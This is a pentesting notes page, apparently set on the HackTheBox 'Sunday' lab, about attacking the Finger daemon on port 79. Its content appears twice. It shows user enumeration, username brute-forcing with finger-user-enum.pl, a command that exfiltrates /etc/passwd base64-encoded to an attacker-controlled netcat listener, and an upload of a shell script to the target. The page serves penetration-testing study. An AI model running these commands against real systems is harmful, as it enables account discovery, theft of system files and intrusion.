Pentesting Finger

Last updated 2 years ago

Was this helpful?

Pentesting Finger

Overview:

The daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
Credit:

PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd

Finger is an exceedingly old protcol very rarely in use today.
Nmap results can show logged in users

| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D

Check for logged in users

finger @10.10.10.76
No one logged on

Check for details on a user

finger jack@10.10.10.76
jack                  ???
#above does not exist 
finger root@10.10.10.76      
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
#user that does exist and is logged in 
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
#user that does exist but is not logged in

Bruteforce Users

root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin

Finger for file Transfers

finger for File Transfer

root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]

root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...

You can upload files to a target machine as well:

root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79

root@sunday:~# finger x@10.10.14.5 > shell.b64

PreviousPentesting LDAP NextUser Recon

Last updated 2 years ago

Was this helpful?

Overview:

The daemon listens on port 79, and is really a relic of a time when computers were far too trusting and open. It provides status reports on logged in users. It can also provide details about a specific user and when they last logged in and from where.
Credit:

PORT      STATE SERVICE   VERSION
79/tcp    open  finger    Sun Solaris fingerd

Finger is an exceedingly old protcol very rarely in use today.
Nmap results can show logged in users

| finger: Login       Name               TTY         Idle    When    Where\x0D
| sunny    sunny                 pts/1            Thu 14:52  10.10.14.245        \x0D

Check for logged in users

finger @10.10.10.76
No one logged on

Check for details on a user

finger jack@10.10.10.76
jack                  ???
#above does not exist 
finger root@10.10.10.76      
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Oct 14 10:28>
#user that does exist and is logged in 
finger ikeuser@10.10.10.76
Login       Name               TTY         Idle    When    Where
ikeuser  IKE Admin                          < .  .  .  . >
#user that does exist but is not logged in

Bruteforce Users

If finger returns no logged in users, we can try to brute force usernames. We’ll use the script from pentestmonkey.

root@kali:~# ./finger-user-enum.pl -U /opt/SecLists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /opt/SecLists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Thu Sep 27 17:39:02 2018 #########
access@10.10.10.76: access No Access User                     < .  .  .  . >..nobody4  SunOS 4.x NFS Anonym               < .  .  .  . >..
admin@10.10.10.76: Login       Name               TTY         Idle    When    Where..adm      Admin                              < .  .  .  . >..lp       Line Printer Admin                 < .  .  .  . >..uucp     uucp Admin                         < .  .  .  . >..nuucp    uucp Admin                         < .  .  .  . >..dladm    Datalink Admin                     < .  .  .  . >..listen   Network Admin                      < .  .  .  . >..
anne marie@10.10.10.76: Login       Name               TTY         Idle    When    Where..anne                  ???..marie                 ???..
bin@10.10.10.76: bin             ???                         < .  .  .  . >..
dee dee@10.10.10.76: Login       Name               TTY         Idle    When    Where..dee                   ???..dee                   ???..
jo ann@10.10.10.76: Login       Name               TTY         Idle    When    Where..jo                    ???..ann                   ???..
la verne@10.10.10.76: Login       Name               TTY         Idle    When    Where..la                    ???..verne                 ???..
line@10.10.10.76: Login       Name               TTY         Idle    When    Where..lp       Line Printer Admin

Finger for file Transfers

finger for File Transfer

While working on this post, I was checking out , and their page on finger shows how it can be used for file transfer. For example, to exfil the password file from Sunday, with the listener started locally:

root@sunday:~# finger "$(base64 /etc/passwd)"@10.10.14.5
[10.10.14.5]

root@kali:~/hackthebox/sunday-10.10.10.76# nc -lnvp 79 | base64 -d > passwd
listening on [any] 79 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.76] 54768

root@kali:~/hackthebox/sunday-10.10.10.76# cat passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
...[snip]...

You can upload files to a target machine as well:

root@kali:~/hackthebox/sunday-10.10.10.76# cat shell.py | base64 | nc -lp 79

root@sunday:~# finger x@10.10.14.5 > shell.b64